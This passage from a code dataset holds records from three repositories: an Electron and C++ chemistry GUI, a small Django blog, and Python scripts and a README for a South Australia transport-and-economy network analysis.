"text": "{\t\"variables\": {\n\t},\n \"targets\": [{\n \"target_name\": \"integrated_cpp_connector\",\n \"cflags!\": [ \"-fno-exceptions\" ],\n \"cflags_cc!\": [ \"-fno-exceptions\" ],\n \"ldflags!\": [\"-rpath\",\".\"],\n \"sources\": [\n \"main_CPPconnector.cpp\"\n ],\n 'include_dirs': [\n \"<!@(node -p \\\"require('node-addon-api').include\\\")\",\n\t\t\t\"./include\"\n ],\n\t\t 'libraries':[\"-Wl,-rpath,.\",\"-L/hd0/lance/projects/BCL_interface/final/src/cppsrc/CPPconnector/include\",\"-lCPPconnector\"],\n 'dependencies': [\n \"<!(node -p \\\"require('node-addon-api').gyp\\\")\"\n ],\n 'defines': [ 'NAPI_DISABLE_CPP_EXCEPTIONS' ]\n }]\n}\n"
},
{
"alpha_fraction": 0.6945193409919739,
"alphanum_fraction": 0.701707124710083,
"avg_line_length": 22.680850982666016,
"blob_id": "e1b030a4125dcf96fdadbba4c19a1bfa10d7fe62",
"content_id": "01907cf1c483485bb6118ee8ec589aebeb02a217",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1113,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 47,
"path": "/main.js",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "const {app, BrowserWindow, ipcMain} = require('electron');\nconst cpp_connector = require('./src/cppsrc/CPPconnector/build/Release/integrated_cpp_connector.node');\n\n\nlet mainWindow;\n\nfunction createWindow () {\n\tmainWindow = new BrowserWindow({\n\t\twidth: 1000,\n\t\theight: 800,\n\t\twebPreferences: {\n\t\t\tnodeIntegration: true\n\t\t}\n\t});\n\t\n\n\t//open DevTool if needed\n\tmainWindow.webContents.openDevTools();\n\t\n\tmainWindow.loadURL(`file://${__dirname}/src/index.html`);\n};\n\nfunction getFromCpp(input){\n\tmodule.exports = cpp_connector;\n\tcpp_output = cpp_connector.hello(input-1);\n\treturn cpp_output;\n}\n\napp.on('ready', createWindow);\n\napp.on('window-all-closed', () => {\n\t// On macOS it is common for applications and their menu bar\n\t// to stay active until the user quits explicitly with Cmd + Q\n\tif (process.platform !== 'darwin') {\n\t app.quit()\n\t}\n});\n\n\nipcMain.on('signalToMain', (event, arg)=> {\n\tconsole.log('main process receiced signal from renderer process, msg:'+arg);\n\t\n\tvar output = getFromCpp(arg);\n\tconsole.log('main process received output from c++, msg:' +output);\n\n\tevent.reply('signalToRenderer', output)\n})\n"
},
{
"alpha_fraction": 0.6649423837661743,
"alphanum_fraction": 0.6677639484405518,
"avg_line_length": 46.78651809692383,
"blob_id": "06e6fcd400eea69829cba0b3620c4bfccf0fe364",
"content_id": "30117e2cad2b154d3c9d8f2c92c550905328b048",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4253,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 89,
"path": "/src/cppsrc/CPPconnector/bcl_chemistry_ligand_design_helper.h",
"repo_name": "LanceKnight/BCL-GUI",
"src_encoding": "UTF-8",
"text": "// (c) Copyright BCL @ Vanderbilt University 2014\n// (c) BCL Homepage: http://www.meilerlab.org/bclcommons\n// (c) The BCL software is developed by the contributing members of the BCL @ Vanderbilt University\n// (c) This file is part of the BCL software suite and is made available under license.\n// (c) To view or modify this file, you must enter into one of the following agreements if you have not done so already:\n// (c) For academic and non-profit users:\n// (c) the BCL Academic Single-User License, available at http://www.meilerlab.org/bclcommons/license\n// (c) For commercial users:\n// (c) The BCL Commercial Site License, available upon request from [email protected]\n// (c) For BCL developers at Vanderbilt University:\n// (c) The BCL Developer Agreement, available at http://www.meilerlab.org/bclcommons/developer_agreement\n// (c)\n// (c) As part of all such agreements, this copyright notice must appear, verbatim and without addition, at the\n// (c) top of all source files of the BCL project and may not be modified by any party except the BCL developers at\n// (c) Vanderbilt University.\n// (c) The BCL copyright and license yields to non-BCL copyrights and licenses where indicated by code comments.\n// (c) Questions about this copyright notice or license agreement may be emailed to [email protected]\n// (c) (for academic users) or [email protected] (for commercial users)\n\n#ifndef BCL_CHEMISTRY_LIGAND_DESIGN_HELPER_H_\n#define BCL_CHEMISTRY_LIGAND_DESIGN_HELPER_H_\n\n// include the namespace header\n#include \"bcl_defines.h\"\n\n// include other forward headers - sorted alphabetically\n\n// includes from bcl - sorted alphabetically\n#include <string>\n\nnamespace bcl\n{\n namespace chemistry\n {\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n //!\n //! @class LigandDesignHelper\n //! @brief Functionality needed by the (java-based) BCL::LigandDesign tool\n //!\n //! @see @link example_chemistry_ligand_design_helper.cpp @endlink\n //! @author mendenjl\n //! @date Mar 02, 2015\n //!\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\n class BCL_API LigandDesignHelper\n {\n public:\n\n //! @brief get the comma separated conformation-independent properties\n //! @return the comma-seperated conformation-independent properties\n static const std::string &GetAvailableProperties();\n\n //! @brief get the comma separated predictions list\n //! @note prediction is defined here as anything that requires a conformation\n //! @return the comma-seperated predictions list\n static const std::string &GetAvailablePredictions();\n\n //! @brief set the directory of the jar file. This is used to locate the bcl-related files\n //! @param JAR_FILE_DIRECTORY the directory containing the jar file; should also contain a bcl folder\n static void SetJarDirectory( const std::string &JAR_FILE_DIR);\n\n //! @brief calculate conformation-independent properties.\n //! @param MOLECULE molecule of interest, encoded as a string in SDF format\n //! @param DESCRIPTORS descriptors (comma seperated) to calculate for the molecule\n //! @return DESCRIPTORS given as values in a comma separated list.\n //! Elements in vector-valued descriptors separated by spaces\n //! Note that if the atom types are undefined, returns empty string\n static std::string CalculateProperties\n (\n const std::string &MOLECULE,\n const std::string &PROPERTIES\n );\n\n //! @brief processes the molecule; producing a 3d-conformation,\n //! @param MOLECULE molecule of interest, encoded as a string in SDF format\n //! @param DESCRIPTORS descriptors (comma seperated) to calculate for the molecule\n //! @return molecule in sdf formation with 3D conformation and DESCRIPTORS as misc properties\n //! Note that if the atom types are undefined, an empty string is returned\n static std::string ProcessMolecule\n (\n const std::string &MOLECULE,\n const std::string &DESCRIPTORS\n );\n };\n } // namespace chemistry\n} // namespace bcl\n\n#endif // BCL_CHEMISTRY_LIGAND_DESIGN_HELPER_H_\n"
}
] | 8 |
SangYoop/boaz_blogmaking
|
https://github.com/SangYoop/boaz_blogmaking
|
48572c7d3a5440e0595d82b7ab87d2f2ea5552ce
|
1708bddcb0a82a589749f51d3bcb5b27df3f3e0a
|
6a6fbcf17ed0dd111d0f75d17ea10a9d40268e09
|
refs/heads/master
| 2021-01-21T01:44:06.203386 | 2016-08-11T07:54:29 | 2016-08-11T07:54:29 | 65,449,783 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.659237265586853,
"alphanum_fraction": 0.6661713719367981,
"avg_line_length": 34.438594818115234,
"blob_id": "3bcd331b1b78719ddc70074f085bce7f0096e157",
"content_id": "77d88bf5149386a8581e1178d65dd118716c6bfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2173,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 57,
"path": "/blog/views.py",
"repo_name": "SangYoop/boaz_blogmaking",
"src_encoding": "UTF-8",
"text": "#coding: utf-8\nfrom django.shortcuts import render,redirect,get_object_or_404\nfrom django.utils import timezone\nfrom .models import Post,Comment\n\n\n# Create your views here. \ndef index(request):\n posts = Post.objects.all().order_by('-published_date')\n user = request.user \n context = {'posts' : posts,'current_user':user,} #request한 사람이 누구인지를 변수로 만들어 던져줌\n return render(request, 'blog/index.html', context)\n\ndef write(request): ## request is one of the django's own objects\n post = Post() ## creating new object for our model\n post.author = request.user ## store author in post.author from request.user, django will make request for our model\n post.title = request.POST['title']\n post.text = request.POST['text']\n post.published_date = timezone.now()\n post.save()\n\n return redirect('blog.views.index')\n \ndef delete(request,pk):\n post = get_object_or_404(Post,pk = pk)\n post.delete()\n return redirect('blog.views.index')\n \ndef edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == \"POST\": ## get dictionary, get is used transferring pk\n post.author = request.user\n post.title = request.POST['title']\n post.text = request.POST['content']\n post.published_date = timezone.now()\n post.save()\n return redirect('blog.views.index')\n else:\n context={'post' : post}\n return render(request, 'blog/post_edit.html', context)\n\ndef reply_write(request):\n comment = Comment()\n # Comment는 비록 post라는 attribute를 가지지만 Post 모델의 인스턴스와 1:N의 관계를\n # 맺으려면 _id를 덧붙여서 post_id 즉 primary key를 통해 관계를 맺을 수 있다.\n comment.post_id = request.POST['id_of_post'] #post의 pk를 다루기 위함! id_of_post > name!\n comment.author = request.user\n comment.text = request.POST['content']\n comment.save()\n \n return redirect('blog.views.index')\n \ndef reply_delete(request, pk):\n comment = get_object_or_404(Comment, pk=pk) #get방식은 인자를 알려줌\n comment.delete()\n \n return redirect('blog.views.index')"
}
] | 1 |
cjsyzwsh/South_Australia_Transport_Econ
|
https://github.com/cjsyzwsh/South_Australia_Transport_Econ
|
d1dafa11487ecae3a1eeb9601229bd1a3af219de
|
8c27f3015193113f8f479e7c0e0c3ff1ac42944e
|
eb1b97853c308cb0f9532730d6ad15edf508a141
|
refs/heads/main
| 2023-05-10T11:48:34.291455 | 2021-06-14T17:00:03 | 2021-06-14T17:00:03 | 353,466,500 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4552238881587982,
"alphanum_fraction": 0.6641790866851807,
"avg_line_length": 13.88888931274414,
"blob_id": "39bea3f8c0485d8e1ecef31876e2bd8fea856b53",
"content_id": "7e316eca3337c0d8d28e7868ffb21b0f841b65b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 134,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "momepy==0.4.4\nnetworkx==2.5.1\npandas==1.2.4\ngeoplot==0.4.1\nmatplotlib==3.4.1\nscipy==1.6.3\ngeopandas==0.9.0\nnumpy==1.20.2\npysal==2.4.0\n"
},
{
"alpha_fraction": 0.7952380776405334,
"alphanum_fraction": 0.7952380776405334,
"avg_line_length": 50.5,
"blob_id": "9acb8571378862476d923c7df001aa52d9fc1e5e",
"content_id": "cd80e4bf3f4b454ee6dbbb5c81a36b8d35e9f8b8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 210,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 4,
"path": "/README.md",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# South_Australia_Transport_Econ\nThis repository analyzes the relationship between transport infrastructure and economic growth in South Australia. It is conducted by Shenhao Wang at Media Lab, MIT.\n\n## Examples\n\n\n\n\n"
},
{
"alpha_fraction": 0.720812201499939,
"alphanum_fraction": 0.7284263968467712,
"avg_line_length": 31.83333396911621,
"blob_id": "f324800c25fea4d14c1f978507e1ae48b52d4be2",
"content_id": "1951252409a8b77b47f31b1a514a1d20ce642133",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 394,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 12,
"path": "/setup.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# sw: not necessary at this point since it is about publishing the repo as a package.\n\nfrom setuptools import find_packages, setup\n\nsetup(\n name='network analysis for transport and economy',\n packages=find_packages(),\n version='0.1.0',\n description='Analyze the relationship between economic growth and transport through network analysis',\n author='Shenhao Wang',\n license='MIT',\n)\n"
},
{
"alpha_fraction": 0.7239593267440796,
"alphanum_fraction": 0.7291396856307983,
"avg_line_length": 44.686439514160156,
"blob_id": "4c960d38fc087c7430a490e465520ab37919eb79",
"content_id": "93fabbaf3cef0af68a943bf98a20d58d8d1fbbcd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5405,
"license_type": "permissive",
"max_line_length": 174,
"num_lines": 118,
"path": "/src/d06_visualization/visualize_policy_simul.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# Visualize the change of nodal and link attributes with policy simulation\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read files\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'rb') as f:\n edge_df_policy_simulation = pickle.load(f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'rb') as f:\n node_df_policy_simulation = pickle.load(f)\n\n\n# merge\n# five columns are relevant:\n# edge_df_policy_simulation: od_duration_save, consumption_amount_increase, consumption_count_increase, flow_agents_increase\n# node_df_policy_simulation: income_increase\nedge_shp = edge_shp.merge(edge_df_policy_simulation[['O','D','od_duration_save','consumption_amount_increase','consumption_count_increase','flow_agents_increase']],\n left_on=['O','D'], right_on=['O','D'],how='inner')\n\nnode_shp = node_shp.merge(node_df_policy_simulation[['SA2_MAIN16','income_increase','job_based_consumption_opportunity_increase','pop_based_consumption_opportunity_increase',\n 'amenity_based_consumption_opportunity_increase','diversity_based_consumption_opportunity_increase']],\n on=['SA2_MAIN16'],how='inner')\n\n#\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp_complete = pickle.load(f)\n\n\n# visualize node change\n# sparse = True # control the visual density in the visualization\ncolumn_name = 'income_increase'\ntitle_name = 'Increase of median income'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_income_increase'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n# ratio\nnode_shp['income_increase_ratio'] = node_shp['income_increase']/node_shp['median_income_per_job_aud_persons']\ncolumn_name = 'income_increase_ratio'\ntitle_name = 'Increase of median income ratio'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_income_increase_ratio'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n#\ncolumn_name = 'pop_based_consumption_opportunity_increase'\ntitle_name = 'Increase of population-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_pop_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'job_based_consumption_opportunity_increase'\ntitle_name = 'Increase of job-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_job_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'amenity_based_consumption_opportunity_increase'\ntitle_name = 'Increase of amenity-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_amenity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'diversity_based_consumption_opportunity_increase'\ntitle_name = 'Increase of diversity-based consumption opportunities'\nsave_path = report_path+'policy_simulation/'\nfig_name = 'simulation_diversity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n\n\n# visualize edge changes\nsparse = False # control the visual density in the visualization. Here I think non-sparse visualization is better.\nplot_dic = [('od_duration_save', 'Travel time saved', 'simulation_od_duration_save'),\n ('consumption_amount_increase', 'Increase of consumption amount', 'simulation_consumption_amount_increase'),\n ('consumption_count_increase', 'Increase of consumption counts', 'simulation_consumption_count_increase'),\n ('flow_agents_increase', 'Increase of people flow', 'simulation_flow_agents_increase')]\n\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n save_path = report_path+'policy_simulation/'\n if not sparse:\n fig_name = each_plot[2]\n util.plot_sa2_edge_attributes(edge_shp, node_shp, column_name, title_name, fig_name, save_path)\n else:\n fig_name = each_plot[2]+'_sparse'\n edge_shp_sparse = edge_shp.loc[edge_shp[column_name] > np.mean(edge_shp[column_name])+np.std(edge_shp[column_name]), :]\n util.plot_sa2_edge_attributes(edge_shp_sparse, node_shp, column_name, title_name, fig_name, save_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7150657176971436,
"alphanum_fraction": 0.7256441116333008,
"avg_line_length": 44.4765625,
"blob_id": "ff7189ce7e560875caf298bb8147a4419f792513",
"content_id": "eba9756db37e2397e28340b3309830f915a18400",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5861,
"license_type": "permissive",
"max_line_length": 205,
"num_lines": 128,
"path": "/src/d06_reporting/print_descriptive_stats.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# this script prints out the descriptive stats to facilitate paper writing.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport copy\n\n# system path\nimport sys\nimport os\nimport seaborn as sns\n\n# use ggplot style\nplt.style.use('ggplot')\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n\n#\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'rb') as f:\n edge_df_policy_simulation = pickle.load(f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'rb') as f:\n node_df_policy_simulation = pickle.load(f)\n\n\n# printing\nprint(\"Number of flow observations is: \", edge_flow_df[['flow_agents']].shape[0])\nprint(\"Number of consumption counts is: \", edge_consumption_df[['consumption_count_mcc_source']].shape[0])\nprint(\"Number of consumption amount is: \", edge_consumption_df[['consumption_amount_mcc_source']].shape[0])\nprint(\"Average travel time is: \", edge_flow_df['od_duration'].mean()/60)\nprint(\"Average travel distance is: \", edge_flow_df['od_distance'].mean())\n\n# descriptive tables\n# socio econ\ndescriptive_table = node_df[['median_income_per_job_aud_persons', 'total_pop']].describe().T\ndescriptive_table.index = ['inc', 'total_pop']\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'socioecon.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\n# visual\nfig,ax = plt.subplots(1,2, figsize = (10, 3))\nax[0].hist(node_df['median_income_per_job_aud_persons'], bins=15, color = 'lightcoral')\nax[1].hist(node_df['total_pop'], bins=15, color = 'bisque')\nax[0].set_title(\"Median income\")\nax[1].set_title(\"Total population\")\nfig.savefig(report_path+'descriptive_visual/'+'socioecon.png')\nplt.close()\n\n\n# mobility and consumption flow\ndescriptive_table = edge_flow_df[['flow_agents']].describe().T\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'mobility_flow.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\ndescriptive_table = edge_consumption_df[['consumption_count_mcc_source', 'consumption_amount_mcc_source']].describe().T\ndescriptive_table.index = ['consumption counts', 'consumption amount']\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'consumption_flow.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\nfig,ax = plt.subplots(1,3, figsize = (10, 3))\nax[0].hist(edge_flow_df['flow_agents'], bins=15, color = 'lightcoral')\nax[1].hist(edge_consumption_df['consumption_count_mcc_source'], bins=15, color = 'bisque')\nax[2].hist(edge_consumption_df['consumption_amount_mcc_source'], bins=15, color = 'moccasin')\nax[0].set_title(\"Mobility flow\")\nax[1].set_title(\"Consumption counts\")\nax[2].set_title(\"Consumption amount\")\nfig.savefig(report_path+'descriptive_visual/'+'flow.png')\nplt.close()\n\n\n# travel time and distance\ndescriptive_table = edge_shp[['od_duration', 'od_distance']].describe().T\ndescriptive_table.index = ['OD Duration', 'OD Distance']\ndescriptive_table = np.round(descriptive_table, decimals = 0)\nwith open(report_path+'descriptive_tables/'+ 'travel_time_distance.txt', 'w') as f:\n f.writelines(descriptive_table.to_latex())\n\nfig,ax = plt.subplots(1,2, figsize = (10, 3))\nax[0].hist(edge_shp['od_duration'], bins=15, color = 'lightcoral')\nax[1].hist(edge_shp['od_distance'], bins=15, color = 'bisque')\nax[0].set_title(\"Travel time\")\nax[1].set_title(\"Travel distance\")\nfig.savefig(report_path+'descriptive_visual/'+'travel.png')\nplt.close()\n\n\n#\nprint(\"Average travel time save ratio is:\", np.mean(edge_df_policy_simulation['od_duration_save']/edge_df_policy_simulation['od_duration']))\nprint(\"Max travel time save ratio is:\", np.max(edge_df_policy_simulation['od_duration_save']/edge_df_policy_simulation['od_duration']))\nprint(\"Average income increase ratio is:\", np.mean(node_df_policy_simulation['income_increase']/node_df_policy_simulation['median_income_per_job_aud_persons']))\nprint(\"Max income increase ratio is:\", np.max(node_df_policy_simulation['income_increase']/node_df_policy_simulation['median_income_per_job_aud_persons']))\nprint(\"Average econ opportunity increase ratio is:\", np.mean(node_df_policy_simulation['amenity_based_consumption_opportunity_increase']/node_df_policy_simulation['amenity_based_consumption_opportunity']))\nprint(\"Max econ opportunity increase ratio is:\", np.max(node_df_policy_simulation['amenity_based_consumption_opportunity_increase']/node_df_policy_simulation['amenity_based_consumption_opportunity']))\nprint(\"Status quo Gini index is: \", util.gini(list(node_df_policy_simulation['median_income_per_job_aud_persons'])))\nnew_inc = node_df_policy_simulation['median_income_per_job_aud_persons']+node_df_policy_simulation['income_increase']\nnew_inc.dropna(inplace = True)\nprint(\"New Gini index is: \", util.gini(list(new_inc)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5670908093452454,
"alphanum_fraction": 0.5820974111557007,
"avg_line_length": 36.150325775146484,
"blob_id": "051851b7f13734591aca1384d727a715319dcbc9",
"content_id": "042c89325647698945ffa8a857f69f16a22ec1d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11395,
"license_type": "permissive",
"max_line_length": 148,
"num_lines": 306,
"path": "/src/d00_utils/utilities.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport momepy\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom sklearn import linear_model\nimport statsmodels.api as sm\nimport matplotlib.pylab as pylab\n\n\ndef compute_road_attributes(shp, road_shp):\n \"\"\"\n Inputs:\n shp - a shp file\n road_shp - the shp file containing road information\n Outputs:\n One shapefile that incorporates the road class attributes\n One shapefile that incorporates the roads in only Adelaide area\n \"\"\"\n \n print(\"=====Running union_road_land_shp=====\")\n \n # create the centroids for roads\n road_centroid = road_shp.centroid\n \n # attach SA2 idx to road networks\n road_shp['SA2_loc'] = -1 # init as -1.\n\n for SA2_idx in range(shp.shape[0]):\n print(SA2_idx)\n \n # assign SA2_idx to the road network\n within_logic = road_centroid.within(shp.loc[SA2_idx, 'geometry'])\n road_shp.loc[within_logic, 'SA2_loc'] = SA2_idx\n \n # Use only the 'class' variable for now. \n road_shp = road_shp[['class', 'geometry', 'SA2_loc']]\n road_shp_dummies = pd.get_dummies(road_shp)\n \n # aggregate the road attribute dummies for SA2.\n road_shp_dummies = road_shp_dummies.loc[road_shp_dummies['SA2_loc'] > -1]\n sa2_road_class_agg=road_shp_dummies.groupby(by='SA2_loc').sum()\n \n # augment road class variables to SA2_network.\n shp = shp.merge(sa2_road_class_agg, how='inner', left_index=True, right_index=True)\n \n # create road networks for only Adelaide\n road_shp_adelaide = road_shp.loc[road_shp['SA2_loc']>-1, :]\n\n print(\"=====DONE union_road_land_shp=====\")\n \n return shp, road_shp_adelaide\n\n\n\ndef compute_intersection_attributes(shp_proj, road_proj):\n \"\"\"\n Inputs:\n shp_proj - a shp projection merged with road info; the first output compute_road_attributes(shp, road_shp)\n road_proj - a shp projection that has only road information; the second output of compute_road_attributes(shp, road_shp)\n Outputs:\n degree_df - a df with SA2 code and its degree counts\n \"\"\"\n\n count = {}\n \n for elt in road_proj[\"SA2_loc\"]:\n if elt in count:\n count[elt] += 1\n else:\n count[elt] = 1\n SA_idxs = sorted((key,count[key]) for key in count)\n \n # create a dictionary to map sa_idx to road graphs\n sa_idx_to_graph = {}\n for sa_idx,c in SA_idxs:\n within = road_proj[road_proj[\"SA2_loc\"]==sa_idx]\n graph = momepy.gdf_to_nx(within, approach='primal')\n sa_idx_to_graph[sa_idx] = graph\n\n # initialize the dataframe for intersections \n degree_df = pd.DataFrame(columns=[\"SA2_MAIN16\", \"num_nodes\", \n \"num_1degree\", \"num_2degree\", \n \"num_3degree\", \"num_4degree\", \n \"num_greater5degree\"])\n\n # compute the degrees of roads for each SA_idx\n for sa_idx in sa_idx_to_graph:\n g = sa_idx_to_graph[sa_idx]\n degree = dict(nx.degree(g))\n nx.set_node_attributes(g, degree, 'degree')\n g = momepy.node_degree(g, name='degree')\n node_df, edge_df, sw = momepy.nx_to_gdf(g, points=True, lines=True, spatial_weights=True)\n\n SA2_MAIN16 = shp_proj.iloc[sa_idx][\"SA2_MAIN16\"]\n #nodes is intersections\n num_nodes = len(node_df)\n #num_0degree = len(node_df[node_df[\"degree\"]==0])\n num_1degree = len(node_df[node_df[\"degree\"]==1])\n num_2degree = len(node_df[node_df[\"degree\"]==2])\n num_3degree = len(node_df[node_df[\"degree\"]==3])\n num_4degree = len(node_df[node_df[\"degree\"]==4])\n num_greater5degree = len(node_df[node_df[\"degree\"]>=5])\n degree_df = degree_df.append({\"SA2_MAIN16\": SA2_MAIN16, \"num_nodes\":num_nodes, \n \"num_1degree\":num_1degree, \"num_2degree\":num_2degree, \"num_3degree\":num_3degree,\n \"num_4degree\":num_4degree,\n \"num_greater5degree\":num_greater5degree},\n ignore_index=True)\n \n return degree_df\n\n\ndef plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete = None):\n '''\n plot the attributes for the SA2 nodes\n '''\n fig, ax = plt.subplots(figsize=(8, 8))\n divider = make_axes_locatable(ax) # for legend size\n cax = divider.append_axes(\"right\", size=\"8%\", pad=0.1) # for legend size\n\n if node_shp_complete is not None:\n node_shp_complete.plot(facecolor='w', edgecolor='lightgrey', ax = ax)\n node_shp.plot(facecolor='w', edgecolor='k', ax = ax)\n node_shp.plot(column = column_name, cmap='summer', legend=True, ax = ax, cax = cax) \n else:\n node_shp.plot(facecolor='w', edgecolor='k', ax = ax)\n node_shp.plot(column = column_name, cmap='summer', legend=True, ax = ax, cax = cax) \n # different cmaps: 'summer', 'OrRd'\n ax.set_title(title_name, fontsize=18)\n ax.set_axis_off()\n plt.tight_layout()\n fig.savefig(save_path+fig_name+'.png')\n plt.close()\n\n\ndef plot_sa2_edge_attributes(edge_shp, node_shp, column_name, title_name, fig_name, save_path):\n '''\n plot the attributes for the SA2 edges\n '''\n fig, ax = plt.subplots(figsize = (8, 8))\n node_shp.plot(facecolor='None', edgecolor='black', ax = ax, zorder = 10)\n node_shp.centroid.plot(ax = ax, facecolor = 'r', markersize = 5.0, zorder = 5)\n edge_shp.plot(column = column_name, cmap='turbo', legend=True, alpha = 0.5, ax = ax, zorder = 0)\n ax.set_title(title_name, fontsize=18)\n ax.set_axis_off()\n plt.tight_layout() \n fig.savefig(save_path+fig_name+'.png')\n plt.close()\n\n\ndef plot_observed_predicted(df, y_name, x_name, model, save_path, picture_title, fig_name):\n '''\n inputs: dataframe, name of output, name of inputs, saved sm model.\n output: saved plot to save_path/fig_name.png\n '''\n y = np.log(df[y_name])\n X = np.log(df[x_name])\n X = sm.add_constant(X)\n pred_y = model.predict(X)\n fig, ax = plt.subplots(figsize = (4, 4))\n ax.scatter(y, pred_y, s = 0.5, color = 'g', marker='o')\n\n # rerun a y ~ pred_y regression for linear visualization.\n linear_visual_mod = sm.OLS(pred_y, sm.add_constant(y))\n linear_visual_res = linear_visual_mod.fit()\n y_list 